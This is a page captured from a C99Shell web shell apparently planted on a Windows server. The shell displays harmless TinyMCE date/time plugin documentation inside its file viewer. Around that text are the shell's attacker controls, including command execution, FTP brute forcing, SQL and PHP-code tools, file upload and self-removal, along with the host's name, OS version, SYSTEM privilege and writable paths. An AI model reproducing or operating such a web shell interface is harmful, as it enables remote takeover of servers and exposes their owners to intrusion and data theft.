!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\formas\tinymce\docs\   drwxrwxrwx
Free 7.95 GB of 239.26 GB (3.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     plugin_insertdatetime.html (2.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Plugin: insertdatetime

Plugin: insertdatetime

Installation Instructions

  • Copy the iespell directory to the plugins directory of TinyMCE (/jscripts/tiny_mce/plugins).
  • Add plugin to TinyMCE plugin option list example: plugins : "iespell".
  • Add the insertdate or inserttime button name to button list, example: theme_advanced_buttons3_add : "insertdate,inserttime".

Initialization Example

tinyMCE.init({
	theme : "advanced",
	mode : "textareas",
	plugins : "insertdatetime",
	theme_advanced_buttons3_add : "insertdate,inserttime"
    plugin_insertdate_dateFormat : "%Y-%m-%d",
    plugin_insertdate_timeFormat : "%H:%M:%S"
});

Options

plugin_insertdate_dateFormat - Format that the date is output as. Defaults to: "%Y-%m-%d".
plugin_insertdate_timeFormat - Format that the time is output as. Defaults to: "%H:%M:%S".

Replacement variables

%y year as a decimal number without a century (range 00 to 99)
%Y year as a decimal number including the century
%d day of the month as a decimal number (range 01 to 31)
%m month as a decimal number (range 01 to 12)
%D same as %m/%d/%y
%r time in a.m. and p.m. notation
%H hour as a decimal number using a 24-hour clock (range 00 to 23)
%I hour as a decimal number using a 12-hour clock (range 01 to 12)
%M minute as a decimal number (range 00-59)
%S second as a decimal number (range 00-59)
%p either "am" or "pm" according to the given time value
%% a literal "%" character


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--